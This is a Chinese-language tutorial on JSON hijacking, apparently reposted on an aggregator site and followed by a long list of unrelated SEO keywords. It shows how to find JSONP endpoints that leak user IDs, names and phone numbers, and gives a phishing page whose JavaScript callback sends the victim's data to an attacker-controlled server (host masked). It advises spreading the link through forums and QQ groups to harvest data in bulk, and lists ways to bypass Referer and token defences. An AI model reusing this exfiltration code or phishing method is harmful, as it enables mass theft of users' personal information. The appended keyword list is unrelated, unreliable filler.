如何进行JSON Hijacking实战利用
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,这篇文章将为大家详细讲解有关如何进行JSON Hijacking实战利用,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。前言JSON Hijacking
千家信息网最后更新 2025年12月01日如何进行JSON Hijacking实战利用
这篇文章将为大家详细讲解有关如何进行JSON Hijacking实战利用,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
前言
JSON Hijacking漏洞的详细利用,有点类似与CSRF,不过原理利用方式不同,在这边文章我着重讲解json跨域劫持的利用环境搭建与方式。
0×01漏洞的挖掘
一般挖掘的过程中,burpsuite代理的History做寻找,过滤多余不可能存在漏洞的一些链接,如下图所示:
我们在返回包中json格式发现了如下的敏感信息(用户Id,用户名,用户手机号码)。
0×02漏洞的证明之poc
提交漏洞,poc在众测时要争分夺秒,所以这边用了最精简的一个POC。
假如返回的数据为:
txf({"data":{"name":"唐晓峰"}});
即可如下弹窗:

0×03漏洞的利用之钓鱼
1.准备一台web服务器,我直接phpstudy搭的。
附上服务器端的代码
json.php
钓鱼.html
txf
var xmlhttp;
function txf(a)
{
xmlhttp=new XMLHttpRequest()
var x="http://***.***.***/json.php?name="+a.data.name;
xmlhttp.open("GET", x, true);
xmlhttp.send();
}
>
>
把钓鱼链接http://***.***.***/钓鱼.html发给该网站已登陆的用户,如论坛,社区QQ群,社区贴吧等,服务端即可获取到大量用户敏感数据。
这边以hackone的一个项目为例:
0×04漏洞的修复与绕过
因为这个例子是小伙伴发过来的还没修复,所以都脱敏了,我们再从开发修复的角度去思考如何绕过修复。
1.Referer白名单
子域名绕过,文件名绕过,空Referer绕过
2.增加token认证
token足够复杂或者服务端加密,我们无法绕过,如果token很简单,如纯数字,我们可以尝试遍历绕过
3.接口禁用
无敌的操作,无法绕过
关于如何进行JSON Hijacking实战利用就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
用户
服务
文章
实战
内容
数据
方式
更多
服务器
知识
社区
篇文章
链接
不同
不错
复杂
争分夺秒
代码
例子
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
vue项目中使用数据库
数据库参考文献外文文献
长子 网络安全宣传周
阿里光网络技术团队
关于网络安全议论文的分论点
西藏软件开发管理
专业的软件开发价格
http安全连接数据库
sql数据库表格迁移
魔兽世界人服务器
数据库创建代码截图
office软件开发流程
变电站网络安全监测装置在哪个区
数据库sql取数工具
hp服务器怎么安全模式
应当制定网络安全应急预案
有没有培训软件开发
数据库意识
美国两大互联网科技公司
软件开发的对赌协议
国内网络安全市场占有率
脚本自动还原数据库
智能语音服务器制作企业
什么时候数据库
制造软件开发需要学什么
浙江苍穹互联网科技
服务器增强的安全配置
网络安全事故+案例
河北安卓软件开发收费报价表
密云区网络技术开发哪家好